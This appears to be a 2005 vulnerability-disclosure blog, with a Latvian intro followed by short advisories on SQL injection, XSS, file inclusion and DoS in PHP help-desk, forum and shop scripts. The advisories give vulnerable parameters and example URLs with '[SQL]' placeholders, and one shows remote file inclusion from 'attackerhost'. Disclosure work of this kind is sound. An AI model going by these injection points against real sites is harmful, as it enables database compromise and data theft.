Pedejas dienas , tad kad bija brivaks laiks izdomaju tapat paskatities pec visadam ievainojamibam, neko jau nopietnu neatradu ari laiku tam daudz neveltiju , + skatijos pavirshi.. to ko atradu nopubliceju sheit un aizsutiju uz secunia + security.noov ... Sanaca man konstatet ka securityfocus sakuma njema no secunia...tad ari ka autors bija "r0t" - mans niks saisinata versija shodien iskatijos kas daras tur pamanot vakardienas atradumus... ieraudziju ka redz tagad jau chakli ko vajag panjem no bloga un negaida uz secunia ... jo tas pats vien Orca foruma ievainojaimbas kredits tiek pieshkkirts"Credit: rakstija r0t3d3Vil is credited with the discovery of this vulnerability"
Nakamajas jau seko r0t3d3vil..
Na ja... visus jau neiemacisi latviski lasit:)

Domajams tuvakjas dienas veel iemetishu paris ievainojamibas ja man buus mazliet briva laika.

Na ja ta ka esmu aiznjemts + RaZbh ari aiznjemts pashlaik cembo strada pie "Alberts" un uzlabo to.. ka ari kkimerejas ab jauno webu...

Par tam advisories..na ja taka bus kaut kada lapele vel iznjemot sho blogu kur ir kish mish, tad ari nolemu a vajag mazliet saita sauram paris kaut kadas jeelas advisories.. Ne man ne komandas biedriem personigi zhetoni nav vajadziigi,bet ja jau sekjuritii..tad sekjuuriti... smiekli naak..:)

Atvainojos visiem ka blogs tagad tika izmantots par bugtraq listi.. Gan jau driiz atkal rakstiishu cik saulainas ir Riigas ielas:)

AgileBill 1.4.x "id" sql injection.

AgileBill "id" parameter sql injection.

Vuln. dicovered by : r0t
Date: 25 nov. 2005
Vendor:http://agileco.com/
affected vesion: 1.4.92 and possible prior versions.

Product Description:
AgileBill features a powerful ticket system that seamlessly integrates with its comprehensive billing and account management tools geared for multiple industries, including digital goods, web hosts, ISPs, and VOIP providers. The Ticket system supports e-mail piping via POP and IMAP accounts, unlimited staff with configurable permissions, unlimited departments with customizable group requirements so you can sell access to clients needing varying support levels, as well as powerful search and reporting capabilities. With AgileBill, there is no need to maintain separate systems for account registration, management, and authentication as it handles all this as well as billing, invoicing, and reporting on the commerce side. Other available plugins for AgileBill include Affiliates, Campaign Tracking, Web Hosting & Domain Automation, Integration with popular CMS and Forum Systems, Content Protection for sellers of Digital Goods, and much more.


Vuln. Description:
In to product_cat parameter "id" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.


example:
http://host/?_page=product_cat:t_Paged%20Listing&id=1[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

cSupport "pg" SQL inj.

cSupport "pg" SQL inj.
Vuln. dicovered by : r0t
Date: 25 nov. 2005
Vendor:www.forperfect.com
Product link:http://www.forperfect.com/csupport/
affected vesion:1.0 and prior

Vuln. Description:
Input passed to the "pg" parameter in "tickets.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.


examples:
/csupport/tickets.php?param=dept&dirc=&pg=[SQL]
/csupport/tickets.php?param=dept&dirc=ASC&pg=[SQL]
/csupport/tickets.php?param=dept&dirc=DESC&pg=[SQL]
/csupport/tickets.php?param=name&dirc=&pg=[SQL]
/csupport/tickets.php?param=subject&dirc=ASC&pg=[SQL]
/csupport/tickets.php?param=timestamp&dirc=DESC&pg=[SQL]
/csupport/tickets.php?param=id&dirc=ASC&pg=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

Thursday, November 24, 2005

iSupport 1.x "include_file" SQL inj.

iSupport 1.x "include_file" SQL inj.
Vuln. dicovered by : r0t
Date: 25 nov. 2005
Vendor:http://www.idevspot.com/
Product link:http://www.idevspot.com/index.php?page=p_detail%7E1
affected vesion: tested on 1.06 and last 1.x

Vuln. Description:
Input passed to the "include_file" parameter in "index.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

example:
/iSupport/index.php?include_file=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.


Also i supose that with special crafted request can be possible local file include of core if..or if...:)

HelpDeskPoint Free Help Desk Software SQL inj.

HelpDeskPoint Free Help Desk Software SQL inj.
Vuln. dicovered by : r0t
Date: 25 nov. 2005
Vendor:http://helpdeskpoint.com
affected version: 2.38 and prior


Product Description:

HelpDeskPoint.com Welcomes you to one of the most advanced help desk support software packages released to the open source community. This help desk application will allow your organization the flexibility it needs to quickly respond to trouble ticket calls. Our help desk support software is written in php and using a My Sql backend. Installing the support software is simple, requiring no programming knowledge. Everything about the help desk software is customizable trough the help desk administrator interface. Please take some time and look around our site, you will find we have provided all the resources necessary to evaluate our help desk support software.


Vuln. Description:

Input passed to the "page" parameter in "index.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

example:
/index.php?page=[SQL]


Solution:
Edit the source code to ensure that input is properly sanitised.

IsolSoft Support Center SQL inj.

IsolSoft Support Center SQL inj.
Vuln. dicovered by : r0t
Date: 24 nov. 2005
Vendor:http://www.isolsoft.com/
affected version:Support Center v2.2 and prior

Vuln. Desciption:
Input passed to the "field" parameter and other sub parameters in "search.php" isn't properly sanitised before being used in a SQL query.This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

example:
/search.php?field=Subject&searchvalue=
&Category=any&Status=any&Priority=any&lorder=[SQL]
/search.php?field=Subject&searchvalue=
&Category=any&Status=any&Priority=[SQL]
/search.php?field=Subject&searchvalue=&Category=any&Status=[SQL]
/search.php?field=Subject&searchvalue=&Category=[SQL]
/search.php?field=Subject&searchvalue=[SQL]
/search.php?field=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

iDesk "cat_id" SQL inj.

iDesk "cat_id" SQL inj.
Vuln. dicovered by : r0t
Date: 24 nov. 2005
Vendor:http://www.nicecoder.com/
affected version: 1.0 and prior

Vuln. description:
Input passed to the "cat_id" parameter in "faq.php" isn't properly sanitised before being used in a SQL query.This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.


Solution:
Edit the source code to ensure that input is properly sanitised.

DeskLance Vuln.

DeskLance Vuln.
Vuln. dicovered by : r0t
Date: 24 nov. 2005
Vendor:http://www.desklance.com/
affected version: 2.3 and prior

Vuln. description:
Input passed to the "main" parameter in "index.php" isn't properly verified, before it is used to include files. This can be exploited to include arbitrary files from external and local resources.

example:
/support/index.php?main=http://attackerhost/file

aslo "announce" variable isn't properly sanitised before being used in a SQL query.It gives it gives to attacker full path and can be exploited by injecting arbitrary SQL code.


Solution:
Edit the source code to ensure that input is properly sanitised.

ActiveCampaign KnowledgeBuilder Vuln.

ActiveCampaign KnowledgeBuilder SQL Injection and Denial of Service.
Vuln. dicovered by : r0t
Date: 24 nov. 2005
Vendor:http://www.activecampaign.com/kb/
KnowledgeBuilder Version: 2.4 and prior

Vuln. description:

1.
Input passed to the "article" parameter in "index.php" isn't properly sanitised before being used in a SQL query.This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
example:
http://host/KnowledgeBuilder/index.php?article=[SQL]


Successful exploitation requires that "magic_quotes_gpc" is disabled.

2.
Input passed to the "category" parameter in "index.php" isn't properly verified, before it is used when sending requests to the database. This can be exploited to cause a large amount of SQL queries to be sent to the database via an invalid "category" parameter.

Successful exploitation causes a vulnerable system to consume a large amount of CPU resources.


Solution:
Edit the source code to ensure that input is properly sanitised.

ActiveCampaign SupportTrio Local File Inclusion vuln.

ActiveCampaign SupportTrio Local File Inclusion vuln.
Vuln. dicovered by : r0t
Date: 24 nov. 2005
Vendor:http://www.activecampaign.com/supporttrio/
affected version: 1.4 and prior

Vuln. description:
Input passed to the "page" parameter in "index.php" isn't properly verified, before it is used to include files. This can be exploited to include arbitrary files from local resources.

Successful exploitation requires that "magic_quotes_gpc" is disabled.


example:
http://host/SupportTrio/index.php?pf=kb&page=host/file

Solution:
Edit the source code to ensure that input is properly sanitised.

Zina SQL injection vulnerability.

Zina SQL injection vulnerability.
Vuln. dicovered by : r0t
Date: 24 nov. 2005
Vendor:http://www.pancake.org/zina/
affected version: Zina v.0.12.07 and prior.

Vuln. description:
Input passed to the "p" parameter in "index.php" isn't properly sanitised before being used in a SQL query.This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.


example:
http://host/zina/index.php?p=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

Wednesday, November 23, 2005

sCssBoard XSS vuln in search param.

sCssBoard XSS vuln in search param.
Vuln. dicovered by : r0t
Date: 24 nov. 2005
Vendor:http://scssboard.if-hosting.com/wiki/index.php/Main_Page
affected version: Tested on sCssBoard 1.2 and 1.12 it can work also in prior versions.

Vuln. description:
There is an input passed parameter in sCssBoard search module wich isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

Solution:
Edit the source code to ensure that input is properly sanitised.

freeForum 1.x "cat" and "thread" SQL inj.

freeForum 1.x "cat" "thread" SQL inj.
Vuln. dicovered by : r0t
Date: 23 nov. 2005
Vendor:http://soft.zoneo.net/freeForum/
affected version: 1.1 and prior

Vuln. description:
Input passed to the "cat" and "thread" parameter in "forum.php" isn't properly sanitised before being used in a SQL query.


example:
/freeForum/forum.php?cat=[SQL]
/freeForum/forum.php?mode=thread&thread=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

Orca forum 4.3.x "msg" Sql inj.

Orca forum 4.3.x "msg" Sql inj.
Vuln. dicovered by : r0t
Date: 23 nov. 2005
Vendor:http://www.greywyvern.com/orca
affected version:4.3b and prior

Product description:
Looking for a simple feedback or discussion forum for your website? Not every site is big enough for scripts like phpBB, which take up an entire page and load you with logins and options that discourage casual contributors.
The Orca Forum is a free and simple discussion board script which can be integrated directly with your existing page layout, or used on its own. It sports the favorite features of the big guys: avatars, email notification, and a BBCode derivative; while retaining the simplicity of an open newsgroup. The threaded layout presents a newsgroup-style navigation system, and also includes a search function, ability to mark posts by date, and the option to order threads by last post (the "bump" system) or original post date (newsgroup style).

Vuln. description:
Input passed to the "msg" parameter in "forum.php" isn't properly sanitised before being used in a SQL query.This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

example:
http://host/forum.php?msg=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

VUBB Forum SQL and XSS vuln.

VUBB Forum SQL and XSS vuln.
Vuln. dicovered by : r0t
Date: 23 nov. 2005
Vendor:http://www.vubb.com/
affected version: alpha rc1


Product description:
Free PHP/MySQL forum/bulletin board system. The only interactive forum where not only administrators fix the bugs and add new features, but the users can too! Features at a glance * Language System, easily change the forums language with the use of language packs. * Administration Control Panel, control every aspect of your forum. * Moderation Options, assign moderators, edit, delete etc options for posts. * Link Forums, use a forum as a link to another site, usefull for affiliate links. * BBCode & Smilies Support, make text bold, italic, insert smilie faces etc. * Template System, control the look of your forum with html templates and css files. * Full Groups & Permissions System, assign users to whatever user group you want, create, edit and delete groups. * Polls, include as many options as you want.


Vuln. description:

1. Multiple SQL Vuln.
Input passed to the "f" parameter in "viewforum.php" isn't properly sanitised before being used in a SQL query.
Input passed to the "t" parameter in "viewtopic.php" isn't properly sanitised before being used in a SQL query.
Input passed to the "view" parameter in "usercp.php" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

examples:

http://host/forum/index.php?act=viewforum&f=[SQL]
http://host/forum/index.php?act=viewtopic&t=[SQL]
http://host/forum/index.php?act=usercp&view=[SQL]

2. XSS

User edit profile fields parameters isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.


Solution:
Edit the source code to ensure that input is properly sanitised.

Web Host Directory Script Multiple vuln.

Softbiz Web Host Directory Script Multiple vuln.
Vuln. dicovered by : r0t
Date: 23 nov. 2005
Vendor:www.softbizscripts.com
Product link:http://www.softbizscripts.com/web-hosting-directory-script.php
affected version:1.1 and prior

Product Description:

Softbiz Web Host Directory Script is an advanced PHP script to run your own web host comparison site. Since companies in web hosting industry offer very high volumes of affiliate commissions, hence this script has a great potential to generate very heavy revenues for you.FULLY customizable colors and graphics of the site make this script VERY SPECIAL.


Vuln Description:

1. Multiple SQL vuln.

Input passed to the "cid" parameter in "search_result.php" and "browsecats.php" isn't properly sanitised before being used in a SQL query.
Input passed to the "sbres_id" parameter in "review.php" isn't properly sanitised before being used in a SQL query.
Input passed to the "h_id" parameter in "email.php" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.


/search_result.php?cid=[SQL]
/review.php?sbres_id=[SQL]
/browsecats.php?cid=[SQL]
/email.php?&h_id=[SQL]

2. SQL in search module

Softbiz Web Hosting Directory Script search engine contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the search feature not properly sanitizing user-supplied input.
This may allow an attacker to inject or manipulate SQL queries in the backend database.Additionally, if a failed query is performed, the program will disclose the software's installation path. While such information is relatively low risk, it is often useful in carrying out additional, more focused attacks.

Solution:
Edit the source code to ensure that input is properly sanitised.

Vote! Pro 4.x "poll_id" Sql inj.

Vote! Pro 4.x "poll_id" Sql inj.

Vuln. dicovered by : r0t
Date: 23 nov. 2005
Vendor: Shedix.com
Product link: http://www.vote-pro.com/
affected version: 4.x and prior.

Product Description:
Vote! Pro 4.0 is php survey and voting poll solution. Unbelievable functionality, and mass of useful functions of this php voting script will give your work special comfort. Flexible and fully-functional survey and voting engine for any type of web site. Easy to install and customize PHP survey script


Vuln Description:
Input passed to the "poll_id" parameter in "poll_frame.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

example:
/poll_frame.php?poll_id=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

Vote Caster 3.x SQL Inj. Vuln.

Vote Caster 3.x SQL Inj. Vuln.
Vuln. dicovered by : r0t
Date 23 nov. 2005
Vendor:http://www.comdevweb.com/
Product link:http://www.comdevweb.com/votecaster.php
affected version: 3.1 and prior.

Vuln. Description:
Input passed to the "campaign_id" parameter in "index.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

example:
/index.php?pageaction=results&campaign_id=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

Commodity Rentals 2.x "user_id" Sql inj.

Commodity Rentals "user_id" Sql inj.

Vuln. dicovered by : r0t
Date: 23 nov. 2005
Vendor:http://www.commodityrentals.com/
affected version: 2.x and prior
Product Description:
CommodityRentals is the most comprehensive Online Rental Business Creator script today. It comes with a full E-Commerce Capacity and is ready to go, out of the box. It can get your Online Rentals business up and running within a matter of hours. Built on a fully extendible and customizable platform, CommodityRentals makes use of an open attribute architecture, allowing you to add your own rental attributes and create your own customized version of your online rental business.

Vuln Description:

Input passed to the "user_id" parameter in "usersession" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.


Solution:
Edit the source code to ensure that input is properly sanitised.

1-2-3 music store "AlbumID" Sql injection.

1-2-3 music store "AlbumID" Sql injection.

Vuln. dicovered by : r0t
Date 23 nov. 2005
Vendor:http://easybe.com/
affected version: 1.0 and prior

Product Description:
Description: 1-2-3 Music Store - the music download shop for musicians and labels. Reasonably-priced software that lets you sell music downloads worldwide and keep full control over your music.

Vuln. Description:
Input passed to the "AlbumID" parameter in "process.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

Solution:
Edit the source code to ensure that input is properly sanitised.

digiSHOP 3.x SQL injection vuln.

digiSHOP 3.x SQL injection vuln.


Vuln. dicovered by : r0t
Date 23 nov. 2005
Vendor:http://digishop.sumeffect.com/
affected version:tested on digiSHOP 3.1.17 , vuln. also can be all 3.x and prior versions.
Vuln. Description:
1.
Input passed to the "product_list&c" parameter in "cart.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

example:
/cart.php?m=product_list&c=[SQL]

2.
Also digiSHOP Search engine contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the search feature not properly sanitizing user-supplied input.
This may allow an attacker to inject or manipulate SQL queries in the backend database.Additionally, if a failed query is performed, the program will disclose the software's installation path. While such information is relatively low risk, it is often useful in carrying out additional, more focused attacks.


Solution:
Edit the source code to ensure that input is properly sanitised.

 
Copyright (c) 2006 Pridels Sec Crew